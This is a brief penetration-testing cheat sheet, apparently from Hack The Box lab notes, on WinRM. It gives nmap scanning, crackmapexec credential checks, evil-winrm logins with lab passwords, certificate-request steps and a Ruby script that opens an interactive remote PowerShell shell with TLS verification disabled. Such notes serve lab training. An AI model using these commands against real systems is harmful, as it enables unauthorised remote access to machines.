[5985/5986] WinRM

#Footprinting
Intrusionz3r0X@htb[/htb]$ nmap -sV -sC 10.129.201.248 -p5985,5986 --disable-arp-ping -n

#Verify password
Intrusionz3r0X@htb[/htb]$ crackmapexec winrm 10.10.11.222 -u 'ansible' -p 'DevT3st@123'

# Log into WinRM
Intrusionz3r0X@htb[/htb]$ evil-winrm -i 10.129.201.248 -u Cry0l1t3 -p P455w0rD!

Evil-winrm with certificate

Intrusionz3r0X@htb[/htb]$ evil-winrm -S -i 10.10.10.103 -u 'amanda' -p 'Ashare1972' -c certnew.cert -k mykey.key

If you face something like this you must create a certificate request so that the server issue the certificate to download.

# Generate private key
openssl genrsa -out mykey.key 2048

# Create a certificate signing request (CSR)
openssl req -new -key mykey.key -out request.csr

Copy and past the request.csr content, paste it and submit. if everything is fine, the server will issue a certificate to use.

require 'winrm'

# Author: Alamot

conn = WinRM::Connection.new( 
  endpoint: 'https://10.10.10.103:5986/wsman',
  transport: :ssl,
  client_cert: 'certnew.cer',
  client_key: 'mykey.key',
  #user: 'amanda',
  #password: 'Ashare1972',
  :no_ssl_peer_verification => true
)

command=""

conn.shell(:powershell) do |shell|
    until command == "exit\n" do
        output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
        print(output.output.chomp)
        command = gets        
        output = shell.run(command) do |stdout, stderr|
            STDOUT.print stdout
            STDERR.print stderr
        end
    end    
    puts "Exiting with code #{output.exitcode}"
end